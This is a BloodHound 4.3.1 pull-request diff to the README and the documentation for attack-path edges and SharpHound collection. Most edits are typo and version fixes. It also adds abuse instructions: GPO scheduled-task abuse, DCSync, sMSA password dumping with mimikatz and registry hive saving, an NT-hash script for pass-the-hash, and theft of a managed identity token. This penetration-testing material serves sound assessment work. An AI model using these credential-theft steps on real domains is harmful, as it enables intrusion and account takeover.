Merge pull request #668 from BloodHoundAD/4.3.1

4.3.1

README.md

@@ -36,7 +36,7 @@ You can create your own example Active Directory environment using [BadBlood](ht
 
 BloodHound uses graph theory to reveal hidden relationships and
 attack paths in an Active Directory environment.
-Copyright (C) 2016-2022 Specter Ops Inc.
+Copyright (C) 2016-2023 Specter Ops Inc.
 
 This program is free software: you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by

docs/conf.py

@@ -18,11 +18,11 @@
 # -- Project information -----------------------------------------------------
 
 project = 'BloodHound'
-copyright = '2016-2022, Specter Ops Inc.'
+copyright = '2016-2023, Specter Ops Inc.'
 author = 'The BloodHound Enterprise Team'
 
 # The full version, including alpha/beta/rc tags
-release = '4.2.0'
+release = '4.3.1'
 
 
 # -- General configuration ---------------------------------------------------

docs/data-analysis/edges.rst

@@ -1242,7 +1242,7 @@ binary bytes for the new DACL/ACE:
   $SD.GetBinaryForm($SDBytes, 0)
 
 Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity
-field of the comptuer account we're taking over, again using PowerView in this case:
+field of the computer account we're taking over, again using PowerView in this case:
 
 ::
 
@@ -1507,6 +1507,29 @@ See the abuse info under the AddMembers edge for more information
 With GenericWrite over a computer, perform resource-based constrained delegation against the
 computer. See the GenericAll edge abuse info for more information about that attack.
 
+**GPO**
+
+With GenericWrite on a GPO, you may make modifications
+to that GPO which will then apply to the users and
+computers affected by the GPO. Select the target object
+you wish to push an evil policy down to, then use the
+gpedit GUI to modify the GPO, using an evil policy that
+allows item-level targeting, such as a new immediate
+scheduled task. Then wait for the group
+policy client to pick up and execute the new evil
+policy. See the references tab for a more detailed write
+up on this abuse.
+
+This edge can be a false positive in rare scenarios. If you have 
+GenericWrite on the GPO with 'This object only' (no inheritance) 
+and no other permissions in the ACL, it is not possible to add or 
+modify settings of the GPO. The GPO's settings are stored in 
+SYSVOL under a folder for the given GPO. Therefore, you need write 
+access to child objects of this folder or create child objects 
+permission. The security descriptor of the GPO is reflected on 
+the folder, meaning permissions to write child items on the GPO
+are required.
+
 Opsec Considerations
 --------------------
 
@@ -1711,7 +1734,7 @@ To abuse this privilege, use Whisker:
 
     Whisker.exe add /target:<TargetPrincipal>
     
-For other optional parameters, view the Whisper documentation.
+For other optional parameters, view the Whisker documentation.
 
 Opsec Considerations
 --------------------
@@ -1939,16 +1962,18 @@ Abuse Info
 Having this privilege over a user grants the ability to reset the user's password. For
 more information about that, see the ForceChangePassword edge section
 
-**Groups**
-
-This privilege grants the ability to modify group memberships. For more information on
-that, see the AddMembers edge section
-
 **Computers**
 
 You may perform resource-based constrained delegation with this privilege over a computer
 object. For more information about that, see the GenericAll edge section.
 
+**Domain**
+The AllExtendedRights privilege grants both the
+DS-Replication-Get-Changes and DS-Replication-Get-Changes-All 
+privileges, which combined allow a principal to replicate objects from the domain.
+This can be abused using the lsadump::dcsync command in mimikatz.
+
+
 Opsec Considerations
 --------------------
 
@@ -2202,6 +2227,86 @@ References
 
 |
 
+DumpSMSAPassword
+^^^^^^^^^^^^^^^^^^^^
+
+A computer with this indicates that a Standalone Managed Service Account (sMSA)
+is installed on it. An actor with administrative privileges on the computer
+can retrieve the sMSA's password by dumping LSA secrets.
+
+Abuse Info
+------------
+
+From an elevated command prompt on the computer where the sMSA resides, run
+mimikatz then execute the following commands:
+
+::
+
+    privilege::debug
+    token::elevate
+    lsadump::secrets
+
+In the output, find *_SC_{262E99C9-6160-4871-ACEC-4E61736B6F21}_* suffixed by the
+name of the targeted sMSA. The next line contains *cur/hex :* followed with the
+sMSA's password hex-encoded.
+
+To use this password, its NT hash must be calculated. This can be done using
+a small python script:
+
+::
+
+    # nt.py
+    import sys, hashlib
+
+    pw_hex = sys.argv[1]
+    nt_hash = hashlib.new('md4', bytes.fromhex(pw_hex)).hexdigest()
+
+    print(nt_hash)
+
+Execute it like so:
+
+::
+
+    python3 nt.py 35f3e1713d61...
+
+To authenticate as the sMSA, leverage pass-the-hash.
+
+Alternatively, to avoid executing mimikatz on the host, you can save a copy of
+the *SYSTEM* and *SECURITY* registry hives from an elevated prompt:
+
+::
+
+    reg save HKLM\SYSTEM %temp%\SYSTEM & reg save HKLM\SECURITY %temp%\SECURITY
+
+Transfer the files named *SYSTEM* and *SECURITY* that were saved at *%temp%* to
+another computer where mimikatz can be safely executed.
+
+On this other computer, run mimikatz from a command prompt then execute the
+following command to obtain the hex-encoded password:
+
+::
+
+    lsadump::secrets /system:C:\path\to\file\SYSTEM /security:C:\path\to\file\SECURITY
+
+Opsec Considerations
+--------------------
+
+Access to registry hives can be monitored and alerted via event ID 4656
+(A handle to an object was requested).
+
+References
+----------
+
+* https://simondotsh.com/infosec/2022/12/12/assessing-smsa.html
+* https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+* https://github.com/gentilkiwi/mimikatz
+
+|
+
+----
+
+|
+
 AZAddMembers
 ^^^^^^^^^^^^
 
@@ -2974,7 +3079,7 @@ References
 
 |
 
-AZKeyVaultKVContributor
+AZKeyVaultContributor
 ^^^^^^^
 
 The Key Vault Contributor role grants full control of the 
@@ -3048,6 +3153,58 @@ References
 
 |
 
+AZManagedIdentity
+^^^^^^^^
+
+Azure resources like Virtual Machines, Logic Apps, and Automation Accounts
+can be assigned to either System- or User-Assigned Managed Identities.
+This assignment allows the Azure resource to authenticate to Azure services
+as the Managed Identity without needing to know the credential for that 
+Managed Identity. Managed Identities, whether System- or User-Assigned, are
+AzureAD Service Principals.
+
+Abuse Info
+------------
+
+You can modify the Azure RM resource to execute actions against Azure with the 
+privileges of the Managed Identity Service Principal.
+
+It is also possible to extract a JSON Web Token (JWT) for the Service Principal, 
+then use that JWT to authenticate as the Service Principal outside the scope of
+the Azure RM resource. Here is how you extract the JWT using PowerShell:
+
+::
+
+
+  $tokenAuthURI = $env:MSI_ENDPOINT + "?resource=https://graph.microsoft.com/&api-version=2017-09-01"
+  $tokenResponse = Invoke-RestMethod -Method Get -Headers @{"Secret"="$env:MSI_SECRET"} -Uri $tokenAuthURI
+  $tokenResponse.access_token
+
+
+We can then use this JWT to authenticate as the Service Principal to the Microsoft 
+Graph APIs using BARK for example.
+
+
+Opsec Considerations
+--------------------
+
+This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse.
+
+References
+----------
+
+* https://attack.mitre.org/techniques/T1078/
+* https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a
+* https://m365internals.com/2021/11/30/lateral-movement-with-managed-identities-of-azure-virtual-machines
+* https://github.com/BloodHoundAD/BARK
+
+|
+
+----
+
+|
+
+
 AZMemberOf
 ^^^^^^^
 
@@ -3837,6 +3994,36 @@ References
 
 |
 
+AZPrivilegedAuthAdmin
+^^^^^^^^^^^^^
+
+This edge indicates the principal has the Privileged Authentication Administrator 
+role active against the target tenant. Principals with this role can update
+sensitive properties for all users. Privileged Authentication Administrator can 
+set or reset any authentication method (including passwords) for any user,
+including Global Administrators.
+
+Abuse Info
+------------
+
+See the abuse info under AZAddSecret or AZResetPassword.
+
+Opsec Considerations
+--------------------
+
+See the opsec consideration under AZAddSecret or AZResetPassword.
+
+References
+----------
+
+* https://learn.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#privileged-authentication-administrator
+
+|
+
+----
+
+|
+
 AZPrivilegedRoleAdmin
 ^^^^^^^^^^^^^^^^^^^^^
 

docs/data-analysis/nodes.rst

@@ -1234,7 +1234,6 @@ Assignments
 -------------------
 
 * **Active Assignments**: The assets with this role actively assigned.
-* **PIM Assignments**: The assets with this PIM assigned.
 
 AZKeyVault
 ^^^^^

docs/data-collection/sharphound-all-flags.rst

@@ -7,13 +7,13 @@ performance, output, and other behaviors.
 Enumeration Options
 ^^^^^^^^^^^^^^^^^^^
 
-CollectionMethod
+CollectionMethods
 ----------------
 
 This tells SharpHound what kind of data you want to collect. These are the most
 common options you'll likely use:
 
-* **Default:** You can specify default collection, or don't use the CollectionMethod
+* **Default:** You can specify default collection, or don't use the CollectionMethods
   option and this is what SharpHound will do. Default collection includes Active
   Directory security group membership, domain trusts, abusable permissions on AD
   objects, OU tree structure, Group Policy links, the most relevant AD object

docs/data-collection/sharphound.rst

@@ -9,7 +9,7 @@ Download the pre-compiled SharpHound binary and PS1 version at
 https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
 
 You can view the source code for SharpHound and build it from source
-by visiting the SharpHound repo at https://github.com/BloodHoundAD/SharpHound3
+by visiting the SharpHound repo at https://github.com/BloodHoundAD/SharpHound
 
 Basic Usage
 ^^^^^^^^^^^
@@ -166,7 +166,7 @@ AV signatures.
 
 If you are on the blue team side, you can use the same AV bypass techniques used by
 the red team, or you can request an exception for the SharpHound binary itself or
-possibly a folder that you run SharpHound out of. Be aware though that whitelisted
+possibly a folder that you run SharpHound out of. Be aware though that AV excluded
 folders and files can commonly be enumerated by low-privilege users running on the
 same system, so try to be as specific as possible with your white-list exceptions.